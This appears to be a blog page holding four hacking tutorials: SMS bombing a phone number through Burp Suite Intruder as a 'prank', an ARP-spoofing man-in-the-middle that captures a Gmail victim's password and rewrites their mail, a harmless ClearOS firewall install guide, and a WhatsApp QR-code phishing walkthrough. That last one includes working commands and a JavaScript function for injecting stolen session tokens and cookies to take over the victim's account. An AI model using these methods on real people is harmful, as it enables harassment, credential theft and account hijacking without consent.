SMS Bombing on Mobile using Burpsuite

In this article we will learn about SMS bombing. It is used to prank your friends by sending those hundreds and thousands of SMS at once. There are many third-party sites to do so but there are usually of no use. We are introducing a different method to do so and all you need is you, Kali.

We are going to use BurpSuite that means we have to set up proxy first. And for that go to browser settings and select Preferences.

Then select an advanced option and then go to network settings.

A dialogue box will open and from it select Manual Proxy Configuration. As you have selected this, you can either keep the http proxy as localhost or you can set it to 127.0.0.1

Now that proxy has been set up open BurpSuite.

Now select the proxy tab and then the options tab and check the checkbox of the interface. Then click on the Edit button on the left side.

It will open a dialogue box. In this select Support invisible proxying option. Click on OK.

When you return to the previous window check the invisible box too.

As of now, all the settings have been done. Now what we need is to send the message and for that, we will log in to way2sms.com.

After logging in generate the message and give the contact number to which you want to send the messages. Before clicking on send turn on the interception in BurpSuite.

When you click the send button the request will first go to Burpsuite as it captures the traffic. When the traffic has been captured right-click anywhere and select Send to intruder option or simply use keyboard shortcut i.e. ctrl+i.

Now in the intruder tab select options tab. It will show you the details of the traffic that is the number to which the SMS was destined to and the text message.

Select the part of the text message and click on add.

Now go to Payloads tab and select Brute Force in the Payload type option.

Then give the character set of 123456789 i.e. 1-9 numbers. And give the minimum length of 1 and the maximum length of 3. Here, minimum and maximum length means the length of digits that will be created using character set. From the customization that we have done, it will create 1100 messages for the receiver.

Now finally to start the attack goes to the intruder menu and select Start Attack from the drop-down menu.

Once the attack starts you can see that the receiver will start receiving all the messages in the interval of 1 to 5 seconds as shown in the image below:

I stopped the attack after 29 messages which were sent in the time span of 1 to 2 minutes.

Author: Shivam Gupta is An Ethical HackerCyber Security Expert, Penetration Tester, India. you can contact here

Hijacking Gmail Message on Air using Burpsuite

There are various vibrant attacks of burpsuite that may not know off; therefore we will try one for those in this article today. We will learn how to get between the networks of Gmail and then to change the message o the mail before it reaches the receiver.

First of all, go to the terminal of Kali and type:

Here,

-i –> interface

wlan0 –> network (This can be either Ethernet or WLAN depending on your victim i.e. if your victim is using eth0 then you should also use eth0)

-t –> target

192.168.100.4 –> Victim IP

192.168.100.1 –> DNS

Execution of the above command will capture the packets that are sent from victim to router. And once we have captured these packets we will open another terminal in Kali and type the following command which will make us capture all the packets from router to victim.

Here,

-i –> interface

wlan0 –> network

-t –> target

192.168.100.1 –> DNS

192.168.100.4 –> victim IP

This command will capture packets that are sent from router to victim IP. Now type the following the command so that IP forwarding is enabled in our PC.

Then type the following the command so that all the packets on port 80 will go through our IP.

Then type the following the command so that we can all the packets on port 443 will go from our IP.

After all, this is done then open burpsuite and go to the proxy tab and then select the options tab. Once you have reached here click on Add button.

Clicking on Add button will make the following options appear. In this give port no 80 in the box adjacent to bind to a port and in specific address give your IP.

Further on, Select Request Handling tab and check Support invisible proxy. And then click on ok.

Repeat the above steps for Port no 443 too.

After clicking on ok make sure all the boxes of running and invisible are checks.

When the victim will sign in his/her Gmail account we have its data captured in burpsuite.

And all this captured data will contain username and password of the victim as shown below.

Here is the closer view to the username and password.

The victim will type and send the message without suspicion:

But as the victim will click on send button its mail will come to us before reaching the destination.

Now you can change the text of the message by a simple left click on the message area and type your message as I changed HELLO THIS IS TESTING to YOU HAVE BEEN HACKED.

Once you change the message then click on Forward button on the top left side and the mail will go forward to its destination as shown below:

Shivam Gupta is An Ethical HackerCyber Security Expert, Penetration Tester, India. you can contact here

Setup Firewall Pentest Lab using Clear OS

Clear OS is basically a Linux based server operating system for small business which comes with server, networking and gateway related functions. Clear OS is available in a Home, Business and free Community Edition. It is normally managed from a web-based interface but it can also be completely operated from a command line. But mostly ClearOS is used as firewall.

Let’s see how to install Clear OS.

First, make bootable disk or pen drive from Yumi or Rufus.

Then restart your computer and select:  Install ClearOS

After selecting press Enter

Select the language in which you are comfortable.

After that Installation summary interface will appear

Select Date and Time from localization section.

Then select installation source and click on done.

After that select Network and host name. Turn on and configure your network setting.

Now after setting everything, clicks on Begin Installation and then installation will start. You have to set root password also.

After finish installing system will reboot. And then clear OS will provide you with a link that contains IP address.  Open that link in a browser.

When you will open that link in your browser it will ask you to login into your account, use username as root and password what you set at the time of installation and login.

After login you have to configure clearOS

Configure network interfaces. Change type to static and set ip address what you set IP address and then click next.

Select your Edition and click next.

Fill system registration form and click next.

Now you have to set hostname for your NIC (Network Interface Card). Set hostname for internal and external NIC and click next.

After that from marketplace you have select and install apps which is required for monitoring, administration. After finishing your configuration a simple dashboard will appear, from here you can utilize clearOS as per your need.

Author: AkshayBhardwaj is a passionate Hacker, Information Security Researcher | Sketch Artist |Technical writer. You can follow him on LinkedIn and Facebook

Hack anyone’s Whatsapp through QR code (Working)

Recently Whatsapp has released a new important update for their Whatsapp users that is End-to-End Encryption, means it’s impossible to decrypt this type of encryption even Whatsapp can’t decrypt it. This is really good news for every Whatsapp users.

But remember “Security is just an illusion” I’m saying this because there is a way by which whatsapp can be hacked and that is by phishing method.

So let’s start first download Selenium standalone server jar file from here

Then open terminal change directory where you downloaded that Selenium server file in my case I downloaded it on my Desktop.

Cd /root/Desktop/

Then type:

./selenium-server-standalone-2.53.0.jar

Now it will start the selenium server. Then open a new terminal and type:

git clone //github.com/Mawalu/whatsapp-phishing.git

It will clone repository of whatsapp-phishingfromGithub. After that type:

cd whatsapp-phishing

Thentype:

npm install

It will install all required things like node.js and socket.io which is required to run website and selenium server. If you encounter any “missing” error then you have to install it manually, toinstall missing part manually type:

npm install node.js

npm install socket.io

npm install wd

After installingtype in terminal:

node index.js

It willstart http and a socket.io server

Now open your MozillaFirefox and type in address bar:

//localhost:8080

When you press enter, it will open a new browser and connect to the web.whatsapp.com and will generate a QR code in the browser. The generated phishing QR code will continuously sync with web.whatsapp.com QR code.

Now send this QR code to a victim through social engineering method, when victim scan that QR code through their mobile Whatsapp scanner then Whatsapp will authenticate the browser which is controlled by selenium server and then fetch tokens and document.cookie from victims Whatsapp.

Now you have to copy tokens and document.cookie, to see stored tokens and document.cookiethere are two ways

  1. First way is go to:

/root/whatsapp-phishing/

In whatsapp-phishing directory a file namedsecrets will be created automatically when victim scan that phishing QR code and that file contains token ID and document.cookie

Second way is go the terminal where js is running already, there you will find that some codes are fetched that is our goddam gold means victim token ID that’s what we require to get access to his/her Whatsapp account.

In both the ways you will find there are multiple token IDs fetched but we only want latest fetched token ID and document.cookie. So to do so copy lastfetched token  which startswith {“s”: and end with   “c”:””} . See the picture for reference.

Then open Firefoxbrowser as incognito mode and then open link //web.whatsapp.com/

After that open developers mode in browser and go to console and type

var t = PASTE_HERE _VICTIM_TOKEN-ID

Then type following code:

> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(‘;’); token.c.forEach(function(cookie) {document.cookie = cookie; });}

And at last type:

>login (t)

Now reload the browser window and wait. Bannggg!!automatically after few seconds you will be logged in as the person who scanned the QR code (phishing QR code that we have created.)

Enjoy. Stay tuned for more tutorials like this.

AUTHOR: AkshayBhardwaj is an Information Security Enthusiast and Researcher | Sketch Artist |Technical writer.

facebook